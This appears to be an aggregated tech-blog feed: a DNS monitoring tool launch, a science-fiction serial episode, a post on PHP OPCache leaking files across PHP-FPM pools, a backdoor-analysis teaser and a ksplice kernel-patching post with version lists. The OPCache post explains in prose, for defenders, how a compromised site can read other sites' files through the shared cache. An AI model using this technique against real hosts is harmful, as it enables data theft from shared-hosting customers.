The post DNS Spy enters public beta appeared first on ma.ttias.be.

Here's an exciting announcement I've been dying to make: DNS Spy, a new DNS monitoring and alerting tool I've been working on, has entered public beta!

After several months of development and a 3-month private, invite-only alpha period, DNS Spy is now publicly available for anyone to try out.

What is DNS Spy?

I'm glad you asked!

DNS Spy is a custom solution for monitoring, alerting and tracking your DNS changes. It was built primarily out of convenience for the following use cases:

  • Get notified when a project I'm working on changes its DNS (usually for the go-live of a new website or application)
  • Get notified when one of my domains has nameserver records that are out-of-sync because zone transfers failed or the SOA didn't get updated properly
  • Get a back-up of all my DNS records per domain in a convenient format, a necessity that became clear after the massive Dyn DNS DDoS attacks

DNS Spy will never be a tool for the masses. It's a tool for sysadmins, developers and managers that are paranoid about their DNS.

In fact, it's built upon a tool I created more than 6 years ago that did one simple thing: send me an e-mail whenever a DNS record I cared about changed value. This is the same tool, on steroids.

Free for Open Source projects

One thing I'm very paranoid about is the current state of our Open Source projects. While a lot of them have big companies supporting them, the majority are run by volunteers doing everything they can to keep things running.

But due to the nature of Open Source, those projects might become hugely popular, on purpose or by accident. Imagine operating a project that's used as a library in an OS, a popular tool or a framework. Suddenly your code gets used in thousands, if not millions, of applications or hardware devices.

What would happen if someone managed to hijack your DNS records and set up a phishing site, similar to yours? Would you know? Would your auto-updaters know? Or the package builders that download your .tar.gz files and include your code in their own projects?

I seriously worry about the current state of our DNS and domain names for open source projects. That's why I offer a lifetime premium account to DNS Spy for any open source project maintainer to help secure and monitor their projects.

If someone hijacks your DNS or you make modifications with unexpected results, I hope DNS Spy can offer a solution or guidance.

Feedback, please!

Since it's still in active development, I'm very much looking for feedback, bug reports and enhancements! If you spot anything, do let me know!

And if you'd like to do me a favor, spread word of DNS Spy to colleagues, open source maintainers and internet geeks -- I can use all the publicity in the world. ;-)

The post DNS Spy enters public beta appeared first on ma.ttias.be.

February 28, 2017

This is post 44 of 44 in the Printeurs series

Nellio, Eva, Max and Junior are in the zone controlled by the industrial conglomerate.

In a religious silence, the four of us step out of the car. All around us, buildings soar in a tortured architecture that gives an impression of space and emptiness. Not the slightest crack, not the slightest speck of dust. Even the ornamental plants seem confined to the restricted, artificial role of a still life. I have the strange feeling of being inside a simulation, a 3D rendering of an architectural project like the ones on billboards next to vacant lots from which marvellous real-estate developments with evocative names are soon supposed to rise.

It takes me a while to realize that no advertising is visible anywhere. And yet the shapes of the buildings depart, with a certain elegance, from an overly strict functionalism. The walls rise with an obvious aesthetic intent in which fractal patterns seem to play a dominant role.

A somewhat brusque breeze suddenly drops a thin sheet of plastic on which the logo of a chocolate brand can barely be made out.

The sheet settles on the sidewalk and seems to sink gently into it, like a slender paper ship going down in solid foam.

I let out a cry of surprise. Junior crouches down.

— Smart sand! The whole complex is made of smart sand!

With a wave of his hand, he gives Max a few instructions. Complying, Max strikes the concrete wall violently with a metal part of his body. The wall seems to crumble slightly. A clearly visible hole forms and the sand starts to pour out, then stops and, before my astonished eyes, climbs back up the wall to plug the hole. A few seconds pass and the wall looks as good as new!

I turn to my companions:

– I thought this smart sand was still only at the prototype stage. But if the whole complex is built out of it, that has profound implications.

Junior gives me a puzzled look.

— It's impressive, but I don't quite see…
— It means the building printed itself. An architect drew the plans and the building rose out of the ground without any human assistance.
— Yes, but where's the problem?
— The problem is that this whole complex may have existed for years, or may be nothing but a decoy, created from scratch in the last twenty-four hours.
— What kind of trap? Max asks.
— The building can reshape itself in response to certain pre-programmed stimuli. We could very well find ourselves locked in.
— We already would be, murmurs Eva. The whole road is made of the same material and could have swallowed us.

I turn toward her.

— Eva, you told me you knew FatNerdz. He's the one who brought us here. Can we trust him?

— Trust?

She stammers slightly, her lower lip trembling.

— It's not a matter of trust, only of logic. You're not dead, Nellio. That single piece of information should be enough for you.

Bravely, she walks up to a glass door and, before my stunned eyes, simply passes through it as if it were a hologram. Junior is exultant!

– Wow! Smart glass! Brilliant! It melts instantly and re-forms. It's impressive.

Without hesitating, we follow in Eva's footsteps. After all, we are now completely under the building's control. If something is going to happen to us, it is already too late.

Crossing the doorway, I feel as if I'm passing under a thin waterfall. A light touch that fades immediately.

I catch up with Eva, with Max and Junior on my heels. I feel something like a slight vibration and a tightening in the pit of my stomach.

— We're going up! The building is pushing us upward without needing an elevator. It's aaaaaah…

Without bothering to finish his sentence, Junior starts screaming. Panicked, he points frantically at his feet. Or rather at the place where his feet should have been. Instead of his shoes, I see two shins sinking cleanly into the floor.

— You're sinking! shouts Eva.
— No, the floor is rising, but without him, Max corrects in his artificially calm, measured voice.
— This is really not the time to argue about that, I say, rushing toward Junior.
— Shit! Shit! he shouts. I can feel it rising.

Indeed, the floor has now reached the upper part of his calves.

— But what is it? Some kind of quicksand?
— No, Eva replies. The building knows exactly what it is doing.

As if in echo, an image forms on a wall. An identity record appears with a photo of Junior in uniform, a service number and a set of metadata about his life and career. A line flashes in red: “Deserter police officer. Dangerous. Total protection required.”

I feel panic taking hold of me. Mechanically, I move toward Junior to try to pull him upward. He screams in pain. Without a word, the three of us set to work, but without success. The floor now reaches almost to Junior's waist, and he suddenly calms down.

— It had to end like this. Total protection. So I'm dangerous enough that any action is justified to put me out of harm's way.
— We have to do something, I say. Max, can't you try to dig into the concrete, so we can carry him above us?

Eva, who has stepped back, looks at me coldly.
— It's useless, Nellio. We are completely in the building's grip. There is nothing to be done.
— But…

I turn my head toward Junior. He tries to give me back a brave look. The floor has now passed his navel. His breathing is becoming more difficult.

— I knew it, he murmurs. I was living on borrowed time. Still, I'm proud. But there's one thing I don't understand. Why am I the only one? What makes the rest of you different?

Eva crouches down to his level.
— This building is confident and only uses positive protection: only confirmed cases are eliminated. The others can move around without any special authorization.
— That makes no sense! Why would I be the only one listed?

Eva thinks for a moment before answering.

— Because you are a deserter police officer, you've been flagged. But as far as the civilian databases are concerned, Max and Nellio are dead. As for me, I simply don't exist. Those two cases probably don't match any of the conditions in the building's program and, by default, it falls back to the automatic routine for authorized personnel. It's a huge security hole, the programmer must have cobbled it together with his feet, but his bug would have gone unnoticed if two dead men and a non-being hadn't shown up.

I let out a cry of surprise, but before I can go any further Junior screams. He has just noticed that his right hand, which he moved while talking, has also started to sink. His fingers are now caught in the floor. Desperately, he tries to raise his left arm and to wriggle free. His body is now sunk past the solar plexus. He struggles laboriously, letting out small cries.

— We can't just stand here doing nothing, watching him die a horrible death, can we? I say, trying to shake Max and Eva by the arms.
— Apparently we can, Max replies laconically.
— But…

Paralyzed with dread, I watch the floor level swallow my friend's shoulders and begin to rise toward his neck. He tilts his head back in a last hope of buying time. The pressure on his lungs must be enormous; he pants, letting out short, high-pitched cries.

— Junior, I say. I… I… You are my friend!

His face is now level with the floor itself, like a hideous bas-relief. The smart sand begins to fill Junior's mouth, and his eyes reflect a pure, raw terror. An abject terror that freezes me and stops my heart from beating.

Breathless, I stay motionless, paralyzed, my eyes riveted on a clean, smooth floor.

 

Photo by Frans de Wit.

This text was published thanks to your regular support on Tipeee and on Paypal. I am @ploum, blogger, writer, speaker and futurologist. You can follow me on Facebook, Medium or contact me.

This text is published under the CC-By BE license.

The post Mitigating PHP’s long standing issue with OPCache leaking sensitive data appeared first on ma.ttias.be.

A very old security vulnerability has been fixed in PHP regarding the way it handles its OPCaches in environments where a single master process shares multiple PHP-FPM pools. This is the most common way to run PHP nowadays and might affect you, too.

The vulnerability

PHP has a method to speed up the dynamic nature of its interpreter, called bytecode caching. PHP gets interpreted on every pageload, meaning the PHP gets translated to bytecode which the server understands and can execute. Since most PHP pages don't change every second, PHP caches that bytecode in memory and can execute the cached version instead of having to compile (or "interpret") the PHP scripts every time.

In a default PHP-FPM setup, the process tree looks like this.

php-fpm: master process (/etc/php-fpm.conf)
\_ php-fpm: pool site1 (uid: 701)
\_ php-fpm: pool site2 (uid: 702)
\_ php-fpm: pool site3 (uid: 703)

There is a single PHP-FPM master process that gets started as the root user. It then spawns additional FPM pools, that can each run as their own user, to serve websites. The PHP OPCache (that bytecode cache) is held in the master process.

So here's the problem: PHP does not validate the user ID when it fetches a script that is already stored in its bytecode cache. The concept of "shared memory" in PHP means everything is stored in the same memory segment, and including a file just checks whether a version already exists in bytecode.

If a version of the script exists in bytecode, it's served without additional check.

If a version of the script does not exist in bytecode, the FPM pool (running as an unprivileged uid) will try to read it from disk, and Linux will prevent reads from files that the process has no access to. You know, like it's supposed to happen.

This is one of the primary reasons I've advocated running multiple masters instead of multiple pools for years.

The solution: upgrade PHP & set additional configurations

After a way too long period, this bug is now resolved and you can fix it with additional master configurations.

$ cat /etc/php-fpm.conf
...
opcache.validate_permission (default "0")
       Leads OPcache to check file readability on each access to cached file.
       This directive should be enabled in shared hosting environment, when few
       users (PHP-FPM pools) reuse the common OPcache shared memory.

opcache.validate_root (default "0")
       This directive prevents file name collisions in different "chroot"
       environments. It should be enabled for sites that may serve requests in
       different "chroot" environments.

The introduction of opcache.validate_permission and opcache.validate_root means you can now force PHP's OPCache to also check the permissions of the file and to validate the root path of the file, to prevent chrooted environments from reading each other's files (more on that in the original bug report).

The default values, however, are insecure.

I understand why they are like this, to keep compatibility with previous versions and avoid breaking changes in minor versions, but you have to explicitly enable them to prevent this behaviour.
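To make that concrete: explicitly enabling both directives could look like the sketch below (the file name and path are assumptions on my part, adjust them to wherever your distribution keeps its PHP configuration), followed by a reload of the FPM master.

$ cat /etc/php.d/99-opcache-hardening.ini
; assumed file, created by hand: explicitly enable the new OPcache checks
opcache.validate_permission=1
opcache.validate_root=1

$ systemctl restart php-fpm

With those set, OPcache checks file readability (and the chroot) on each access to a cached file, as described in the documentation quoted above.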

Minimum versions: PHP 5.6.29, 7.0.14, 7.1.0

This fix didn't get much attention and I only noticed it after someone posted to the oss-security mailing list. To mitigate this properly, you'll need at least one of the versions mentioned above (PHP 5.6.29, 7.0.14 or 7.1.0).

Anything lower than 5.6 is already end of life and won't get this fix, even though OPCache got introduced in PHP 5.5. You'll need a recent 5.6 or newer to mitigate this.

If you still run PHP 5.5 (which many do) and want to be safe, your best bet is to either run multiple PHP masters (a single master per pool) or disable OPCache entirely.

Indirect local privilege escalation to root

This has been a long standing issue with PHP that's actually more serious than it looks at first glance.

If you manage to compromise a single website (which, for most PHP CMSes that don't get updated, isn't very hard), this shared memory allows you access to all other websites, if their pages have been cached in the OPCache.

You can effectively use this shared memory buffer as a passageway to read other websites' PHP files, read their configs, get access to their databases and steal all their data. To do so, you usually need root access to a server, but PHP's OPCache gives you a convenient shortcut to accomplish similar things.

All you need is the path to their files, which can either be retrieved via opcache_get_status() (if enabled, which again -- it is by default), or you can guess the paths, which on shared hosting environments usually isn't hard either.

This actually makes this shared memory architecture almost as bad as a local privilege escalation vulnerability, depending on what you want to accomplish. If your goal is to steal data from a server that normally requires root privileges, you got it.

If your goal is to actually get root and run root-only scripts (aka: bind on lower ports etc.), that won't be possible.

The good part is, there's now a fix with the new PHP configurations. The bad news is, you need to update to the latest releases to get it and explicitly enable it.

Additional sources

For your reading pleasure:

The post Mitigating PHP’s long standing issue with OPCache leaking sensitive data appeared first on ma.ttias.be.

I published the following diary on isc.sans.org: “Analysis of a Simple PHP Backdoor“.

With the huge attack surface provided by CMSes like Drupal or WordPress, webshells remain a classic attack scenario. A few months ago, I wrote a diary about the power of webshells. A few days ago, a friend of mine asked me for some help with an incident he was investigating. A website was compromised (no magic – very bad admin password) and a backdoor was dropped. He sent a copy of the malicious file… [Read more]

[The post [SANS ISC Diary] Analysis of a Simple PHP Backdoor has been first published on /dev/random]

February 24, 2017

As many of you probably know by now, a few days ago there was a report of an old, long-standing Linux kernel bug, going back to kernels as old as 2.6.18 and possibly earlier. This bug was recently fixed, see here.

Now, distribution vendors, including us, have released kernel updates that customers/users can download and install but as always a regular kernel upgrade requires a reboot. We have had ksplice as a service for Oracle Linux support customers for quite a few years now and we also support Ubuntu and Fedora for free for anyone (see here).

One thing that is not often talked about but, I believe is very powerful and I wanted to point out here, is the following:

Typically the distribution vendors (including us) will release an updated kernel that's the 'latest' version with these CVEs fixed, but many customers run older versions of both the distribution and kernels. We now see some other vendors trying to provide the basics for some online patching, but by and large it's based on one-offs and for specific kernels. A big part of the ksplice service is the backend infrastructure to easily build updates for literally a few thousand kernels. This gives customers great flexibility. You can be on one of many dot-releases of the OS and you can use ksplice. Here is a list of example kernel versions for Oracle Linux that you could be running today and that we provide ksplice updates for, for instance for this DCCP bug. That's a big difference with what other folks have been trying to mimic now that online patching has become more and more important for availability.

Here is an example kernel: 2.6.32-573.7.1.el6.x86_64 #1 SMP Tue Sep 22 08:34:17 PDT 2015. So that's a kernel built back in September 2015, a random 'dot release' I run on one of my machines, and there's a ksplice patch available for these recent CVEs. I don't have to worry about having to install the 'latest' kernel, nor about doing a reboot.

# uptrack-upgrade 
The following steps will be taken:
Install [f4muxalm] CVE-2017-6074: Denial-of-service when using IPV6_RECVPKTINFO socket option.
Install [5ncctcgz] CVE-2016-9555: Remote denial-of-service due to SCTP state machine memory corruption.

Go ahead [y/N]? y
Installing [f4muxalm] CVE-2017-6074: Denial-of-service when using IPV6_RECVPKTINFO socket option.
Installing [5ncctcgz] CVE-2016-9555: Remote denial-of-service due to SCTP state machine memory corruption.
Your kernel is fully up to date.
Effective kernel version is 2.6.32-642.15.1.el6

and done. That easy. My old 2.6.32-573.7.1 kernel looks like 2.6.32-642.15.1 in terms of critical fixes and CVEs.

# uptrack-show
Installed updates:
[cct5dnbf] Clear garbage data on the kernel stack when handling signals.
[ektd95cj] Reduce usage of reserved percpu memory.
[uuhgbl3e] Remote denial-of-service in Brocade Ethernet driver.
[kg3f16ii] CVE-2015-7872: Denial-of-service when garbage collecting uninstantiated keyring.
[36ng2h1l] CVE-2015-7613: Privilege escalation in IPC object initialization.
[33jwvtbb] CVE-2015-5307: KVM host denial-of-service in alignment check.
[38gzh9gl] CVE-2015-8104: KVM host denial-of-service in debug exception.
[6wvrdj93] CVE-2015-2925: Privilege escalation in bind mounts inside namespaces.
[1l4i9dfh] CVE-2016-0774: Information leak in the pipe system call on failed atomic read.
[xu4auj49] CVE-2015-5157: Disable modification of LDT by userspace processes.
[554ck5nl] CVE-2015-8767: Denial-of-service in SCTP heartbeat timeout.
[adgeye5p] CVE-2015-8543: Denial-of-service on out of range protocol for raw sockets.
[5ojkw9lv] CVE-2015-7550: Denial-of-service when reading and revoking a key concurrently.
[gfr93o7j] CVE-2015-8324: NULL pointer dereference in ext4 on mount error.
[ft01zrkg] CVE-2013-2015, CVE-2015-7509: Possible privilege escalation when mounting an non-journaled ext4 filesystem.
[87lw5yyy] CVE-2015-8215: Remote denial-of-service of network traffic when changing the MTU.
[2bby9cuy] CVE-2010-5313, CVE-2014-7842: Denial of service in KVM L1 guest from L2 guest.
[orjsp65y] CVE-2015-5156: Denial-of-service in Virtio network device.
[5j4hp0ot] Device Mapper logic error when reloading the block multi-queue.
[a1e5kxp6] CVE-2016-4565: Privilege escalation in Infiniband ioctl.
[gfpg64bh] CVE-2016-5696: Session hijacking in TCP connections.
[b4ljcwin] Message corruption in pseudo terminal output.
[prijjgt5] CVE-2016-4470: Denial-of-service in the keyring subsystem.
[4y2f30ch] CVE-2016-5829: Memory corruption in unknown USB HID devices.
[j1mivn4f] Denial-of-service when resetting a Fibre Channel over Ethernet interface.
[nawv8jdu] CVE-2016-5195: Privilege escalation when handling private mapping copy-on-write.
[97fe0h7s] CVE-2016-1583: Privilege escalation in eCryptfs.
[fdztfgcv] Denial-of-service when sending a TCP reset from the netfilter.
[gm4ldjjf] CVE-2016-6828: Use after free during TCP transmission.
[s8pymcf8] CVE-2016-7117: Denial-of-service in recvmmsg() error handling.
[1ktf7029] CVE-2016-4997, CVE-2016-4998: Privilege escalation in the Netfilter driver.
[f4muxalm] CVE-2017-6074: Denial-of-service when using IPV6_RECVPKTINFO socket option.
[5ncctcgz] CVE-2016-9555: Remote denial-of-service due to SCTP state machine memory corruption.

Effective kernel version is 2.6.32-642.15.1.el6

Here is the list of kernels we build modules for as part of Oracle Linux customers' kernel choices:

oracle-2.6.18-238.0.0.0.1.el5
oracle-2.6.18-238.1.1.0.1.el5
oracle-2.6.18-238.5.1.0.1.el5
oracle-2.6.18-238.9.1.0.1.el5
oracle-2.6.18-238.12.1.0.1.el5
oracle-2.6.18-238.19.1.0.1.el5
oracle-2.6.18-274.0.0.0.1.el5
oracle-2.6.18-274.3.1.0.1.el5
oracle-2.6.18-274.7.1.0.1.el5
oracle-2.6.18-274.12.1.0.1.el5
oracle-2.6.18-274.17.1.0.1.el5
oracle-2.6.18-274.18.1.0.1.el5
oracle-2.6.18-308.0.0.0.1.el5
oracle-2.6.18-308.1.1.0.1.el5
oracle-2.6.18-308.4.1.0.1.el5
oracle-2.6.18-308.8.1.0.1.el5
oracle-2.6.18-308.8.2.0.1.el5
oracle-2.6.18-308.11.1.0.1.el5
oracle-2.6.18-308.13.1.0.1.el5
oracle-2.6.18-308.16.1.0.1.el5
oracle-2.6.18-308.20.1.0.1.el5
oracle-2.6.18-308.24.1.0.1.el5
oracle-2.6.18-348.0.0.0.1.el5
oracle-2.6.18-348.1.1.0.1.el5
oracle-2.6.18-348.2.1.0.1.el5
oracle-2.6.18-348.3.1.0.1.el5
oracle-2.6.18-348.4.1.0.1.el5
oracle-2.6.18-348.6.1.0.1.el5
oracle-2.6.18-348.12.1.0.1.el5
oracle-2.6.18-348.16.1.0.1.el5
oracle-2.6.18-348.18.1.0.1.el5
oracle-2.6.18-371.0.0.0.1.el5
oracle-2.6.18-371.1.2.0.1.el5
oracle-2.6.18-371.3.1.0.1.el5
oracle-2.6.18-371.4.1.0.1.el5
oracle-2.6.18-371.6.1.0.1.el5
oracle-2.6.18-371.8.1.0.1.el5
oracle-2.6.18-371.9.1.0.1.el5
oracle-2.6.18-371.11.1.0.1.el5
oracle-2.6.18-371.12.1.0.1.el5
oracle-2.6.18-398.0.0.0.1.el5
oracle-2.6.18-400.0.0.0.1.el5
oracle-2.6.18-400.1.1.0.1.el5
oracle-2.6.18-402.0.0.0.1.el5
oracle-2.6.18-404.0.0.0.1.el5
oracle-2.6.18-406.0.0.0.1.el5
oracle-2.6.18-407.0.0.0.1.el5
oracle-2.6.18-408.0.0.0.1.el5
oracle-2.6.18-409.0.0.0.1.el5
oracle-2.6.18-410.0.0.0.1.el5
oracle-2.6.18-411.0.0.0.1.el5
oracle-2.6.18-412.0.0.0.1.el5
oracle-2.6.18-416.0.0.0.1.el5
oracle-2.6.18-417.0.0.0.1.el5
oracle-2.6.18-418.0.0.0.1.el5
oracle-2.6.32-642.0.0.0.1.el6
oracle-3.10.0-514.6.1.0.1.el7
oracle-3.10.0-514.6.2.0.1.el7
oracle-uek-2.6.39-100.5.1
oracle-uek-2.6.39-100.6.1
oracle-uek-2.6.39-100.7.1
oracle-uek-2.6.39-100.10.1
oracle-uek-2.6.39-200.24.1
oracle-uek-2.6.39-200.29.1
oracle-uek-2.6.39-200.29.2
oracle-uek-2.6.39-200.29.3
oracle-uek-2.6.39-200.31.1
oracle-uek-2.6.39-200.32.1
oracle-uek-2.6.39-200.33.1
oracle-uek-2.6.39-200.34.1
oracle-uek-2.6.39-300.17.1
oracle-uek-2.6.39-300.17.2
oracle-uek-2.6.39-300.17.3
oracle-uek-2.6.39-300.26.1
oracle-uek-2.6.39-300.28.1
oracle-uek-2.6.39-300.32.4
oracle-uek-2.6.39-400.17.1
oracle-uek-2.6.39-400.17.2
oracle-uek-2.6.39-400.21.1
oracle-uek-2.6.39-400.21.2
oracle-uek-2.6.39-400.23.1
oracle-uek-2.6.39-400.24.1
oracle-uek-2.6.39-400.109.1
oracle-uek-2.6.39-400.109.3
oracle-uek-2.6.39-400.109.4
oracle-uek-2.6.39-400.109.5
oracle-uek-2.6.39-400.109.6
oracle-uek-2.6.39-400.209.1
oracle-uek-2.6.39-400.209.2
oracle-uek-2.6.39-400.210.2
oracle-uek-2.6.39-400.211.1
oracle-uek-2.6.39-400.211.2
oracle-uek-2.6.39-400.211.3
oracle-uek-2.6.39-400.212.1
oracle-uek-2.6.39-400.214.1
oracle-uek-2.6.39-400.214.3
oracle-uek-2.6.39-400.214.4
oracle-uek-2.6.39-400.214.5
oracle-uek-2.6.39-400.214.6
oracle-uek-2.6.39-400.215.1
oracle-uek-2.6.39-400.215.2
oracle-uek-2.6.39-400.215.3
oracle-uek-2.6.39-400.215.4
oracle-uek-2.6.39-400.215.6
oracle-uek-2.6.39-400.215.7
oracle-uek-2.6.39-400.215.10
oracle-uek-2.6.39-400.215.11
oracle-uek-2.6.39-400.215.12
oracle-uek-2.6.39-400.215.13
oracle-uek-2.6.39-400.215.14
oracle-uek-2.6.39-400.215.15
oracle-uek-2.6.39-400.243.1
oracle-uek-2.6.39-400.245.1
oracle-uek-2.6.39-400.246.2
oracle-uek-2.6.39-400.247.1
oracle-uek-2.6.39-400.248.3
oracle-uek-2.6.39-400.249.1
oracle-uek-2.6.39-400.249.3
oracle-uek-2.6.39-400.249.4
oracle-uek-2.6.39-400.250.2
oracle-uek-2.6.39-400.250.4
oracle-uek-2.6.39-400.250.5
oracle-uek-2.6.39-400.250.6
oracle-uek-2.6.39-400.250.7
oracle-uek-2.6.39-400.250.9
oracle-uek-2.6.39-400.250.10
oracle-uek-2.6.39-400.250.11
oracle-uek-2.6.39-400.264.1
oracle-uek-2.6.39-400.264.4
oracle-uek-2.6.39-400.264.5
oracle-uek-2.6.39-400.264.6
oracle-uek-2.6.39-400.264.13
oracle-uek-2.6.39-400.276.1
oracle-uek-2.6.39-400.277.1
oracle-uek-2.6.39-400.278.1
oracle-uek-2.6.39-400.278.2
oracle-uek-2.6.39-400.278.3
oracle-uek-2.6.39-400.280.1
oracle-uek-2.6.39-400.281.1
oracle-uek-2.6.39-400.282.1
oracle-uek-2.6.39-400.283.1
oracle-uek-2.6.39-400.283.2
oracle-uek-2.6.39-400.284.1
oracle-uek-2.6.39-400.284.2
oracle-uek-2.6.39-400.286.2
oracle-uek-2.6.39-400.286.3
oracle-uek-2.6.39-400.290.1
oracle-uek-2.6.39-400.290.2
oracle-uek-2.6.39-400.293.1
oracle-uek-2.6.39-400.293.2
oracle-uek-2.6.39-400.294.1
oracle-uek-2.6.39-400.294.2
oracle-uek-2.6.39-400.128.21
oracle-uek-3.8.13-16
oracle-uek-3.8.13-16.1.1
oracle-uek-3.8.13-16.2.1
oracle-uek-3.8.13-16.2.2
oracle-uek-3.8.13-16.2.3
oracle-uek-3.8.13-16.3.1
oracle-uek-3.8.13-26
oracle-uek-3.8.13-26.1.1
oracle-uek-3.8.13-26.2.1
oracle-uek-3.8.13-26.2.2
oracle-uek-3.8.13-26.2.3
oracle-uek-3.8.13-26.2.4
oracle-uek-3.8.13-35
oracle-uek-3.8.13-35.1.1
oracle-uek-3.8.13-35.1.2
oracle-uek-3.8.13-35.1.3
oracle-uek-3.8.13-35.3.1
oracle-uek-3.8.13-35.3.2
oracle-uek-3.8.13-35.3.3
oracle-uek-3.8.13-35.3.4
oracle-uek-3.8.13-35.3.5
oracle-uek-3.8.13-44
oracle-uek-3.8.13-44.1.1
oracle-uek-3.8.13-44.1.3
oracle-uek-3.8.13-44.1.4
oracle-uek-3.8.13-44.1.5
oracle-uek-3.8.13-55
oracle-uek-3.8.13-55.1.1
oracle-uek-3.8.13-55.1.2
oracle-uek-3.8.13-55.1.5
oracle-uek-3.8.13-55.1.6
oracle-uek-3.8.13-55.1.8
oracle-uek-3.8.13-55.2.1
oracle-uek-3.8.13-68
oracle-uek-3.8.13-68.1.2
oracle-uek-3.8.13-68.1.3
oracle-uek-3.8.13-68.2.2
oracle-uek-3.8.13-68.2.2.1
oracle-uek-3.8.13-68.2.2.2
oracle-uek-3.8.13-68.3.1
oracle-uek-3.8.13-68.3.2
oracle-uek-3.8.13-68.3.3
oracle-uek-3.8.13-68.3.4
oracle-uek-3.8.13-68.3.5
oracle-uek-3.8.13-98
oracle-uek-3.8.13-98.1.1
oracle-uek-3.8.13-98.1.2
oracle-uek-3.8.13-98.2.1
oracle-uek-3.8.13-98.2.2
oracle-uek-3.8.13-98.4.1
oracle-uek-3.8.13-98.5.2
oracle-uek-3.8.13-98.6.1
oracle-uek-3.8.13-98.7.1
oracle-uek-3.8.13-98.8.1
oracle-uek-3.8.13-118
oracle-uek-3.8.13-118.2.1
oracle-uek-3.8.13-118.2.2
oracle-uek-3.8.13-118.2.4
oracle-uek-3.8.13-118.2.5
oracle-uek-3.8.13-118.3.1
oracle-uek-3.8.13-118.3.2
oracle-uek-3.8.13-118.4.1
oracle-uek-3.8.13-118.4.2
oracle-uek-3.8.13-118.6.1
oracle-uek-3.8.13-118.6.2
oracle-uek-3.8.13-118.7.1
oracle-uek-3.8.13-118.8.1
oracle-uek-3.8.13-118.9.1
oracle-uek-3.8.13-118.9.2
oracle-uek-3.8.13-118.10.2
oracle-uek-3.8.13-118.11.2
oracle-uek-3.8.13-118.13.2
oracle-uek-3.8.13-118.13.3
oracle-uek-3.8.13-118.14.1
oracle-uek-3.8.13-118.14.2
oracle-uek-3.8.13-118.15.1
oracle-uek-3.8.13-118.15.2
oracle-uek-3.8.13-118.15.3
oracle-uek-3.8.13-118.16.2
oracle-uek-3.8.13-118.16.3
oracle-uek-4.1.12-32
oracle-uek-4.1.12-32.1.2
oracle-uek-4.1.12-32.1.3
oracle-uek-4.1.12-32.2.1
oracle-uek-4.1.12-32.2.3
oracle-uek-4.1.12-37.2.1
oracle-uek-4.1.12-37.2.2
oracle-uek-4.1.12-37.3.1
oracle-uek-4.1.12-37.4.1
oracle-uek-4.1.12-37.5.1
oracle-uek-4.1.12-37.6.1
oracle-uek-4.1.12-37.6.2
oracle-uek-4.1.12-37.6.3
oracle-uek-4.1.12-61.1.6
oracle-uek-4.1.12-61.1.9
oracle-uek-4.1.12-61.1.10
oracle-uek-4.1.12-61.1.13
oracle-uek-4.1.12-61.1.14
oracle-uek-4.1.12-61.1.16
oracle-uek-4.1.12-61.1.17
oracle-uek-4.1.12-61.1.18
oracle-uek-4.1.12-61.1.19
oracle-uek-4.1.12-61.1.21
oracle-uek-4.1.12-61.1.22
oracle-uek-4.1.12-61.1.23
oracle-uek-4.1.12-61.1.24
oracle-uek-4.1.12-61.1.25
oracle-uek-4.1.12-61.1.27
rhel-2.6.32-71.el6
rhel-2.6.32-71.7.1.el6
rhel-2.6.32-71.14.1.el6
rhel-2.6.32-71.18.1.el6
rhel-2.6.32-71.18.2.el6
rhel-2.6.32-71.24.1.el6
rhel-2.6.32-71.29.1.el6
rhel-2.6.32-131.0.15.el6
rhel-2.6.32-131.2.1.el6
rhel-2.6.32-131.4.1.el6
rhel-2.6.32-131.6.1.el6
rhel-2.6.32-131.12.1.el6
rhel-2.6.32-131.17.1.el6
rhel-2.6.32-131.21.1.el6
rhel-2.6.32-220.el6
rhel-2.6.32-220.2.1.el6
rhel-2.6.32-220.4.1.el6
rhel-2.6.32-220.4.2.el6
rhel-2.6.32-220.7.1.el6
rhel-2.6.32-220.13.1.el6
rhel-2.6.32-220.17.1.el6
rhel-2.6.32-220.23.1.el6
rhel-2.6.32-279.el6
rhel-2.6.32-279.1.1.el6
rhel-2.6.32-279.2.1.el6
rhel-2.6.32-279.5.1.el6
rhel-2.6.32-279.5.2.el6
rhel-2.6.32-279.9.1.el6
rhel-2.6.32-279.11.1.el6
rhel-2.6.32-279.14.1.el6
rhel-2.6.32-279.19.1.el6
rhel-2.6.32-279.22.1.el6
rhel-2.6.32-358.el6
rhel-2.6.32-358.0.1.el6
rhel-2.6.32-358.2.1.el6
rhel-2.6.32-358.6.1.el6
rhel-2.6.32-358.6.2.el6
rhel-2.6.32-358.6.2.el6.x86_64.crt1
rhel-2.6.32-358.11.1.el6
rhel-2.6.32-358.14.1.el6
rhel-2.6.32-358.18.1.el6
rhel-2.6.32-358.23.2.el6
rhel-2.6.32-431.el6
rhel-2.6.32-431.1.2.el6
rhel-2.6.32-431.3.1.el6
rhel-2.6.32-431.5.1.el6
rhel-2.6.32-431.11.2.el6
rhel-2.6.32-431.17.1.el6
rhel-2.6.32-431.20.3.el6
rhel-2.6.32-431.20.5.el6
rhel-2.6.32-431.23.3.el6
rhel-2.6.32-431.29.2.el6
rhel-2.6.32-504.el6
rhel-2.6.32-504.1.3.el6
rhel-2.6.32-504.3.3.el6
rhel-2.6.32-504.8.1.el6
rhel-2.6.32-504.12.2.el6
rhel-2.6.32-504.16.2.el6
rhel-2.6.32-504.23.4.el6
rhel-2.6.32-504.30.3.el6
rhel-2.6.32-573.el6
rhel-2.6.32-573.1.1.el6
rhel-2.6.32-573.3.1.el6
rhel-2.6.32-573.7.1.el6
rhel-2.6.32-573.8.1.el6
rhel-2.6.32-573.12.1.el6
rhel-2.6.32-573.18.1.el6
rhel-2.6.32-573.22.1.el6
rhel-2.6.32-573.26.1.el6
rhel-2.6.32-642.el6
rhel-2.6.32-642.1.1.el6
rhel-2.6.32-642.3.1.el6
rhel-2.6.32-642.4.2.el6
rhel-2.6.32-642.6.1.el6
rhel-2.6.32-642.6.2.el6
rhel-2.6.32-642.11.1.el6
rhel-2.6.32-642.13.1.el6
rhel-2.6.32-642.13.2.el6
rhel-3.10.0-123.el7
rhel-3.10.0-123.1.2.el7
rhel-3.10.0-123.4.2.el7
rhel-3.10.0-123.4.4.el7
rhel-3.10.0-123.6.3.el7
rhel-3.10.0-123.8.1.el7
rhel-3.10.0-123.9.2.el7
rhel-3.10.0-123.9.3.el7
rhel-3.10.0-123.13.1.el7
rhel-3.10.0-123.13.2.el7
rhel-3.10.0-123.20.1.el7
rhel-3.10.0-229.el7
rhel-3.10.0-229.1.2.el7
rhel-3.10.0-229.4.2.el7
rhel-3.10.0-229.7.2.el7
rhel-3.10.0-229.11.1.el7
rhel-3.10.0-229.14.1.el7
rhel-3.10.0-229.20.1.el6.x86_64.knl2
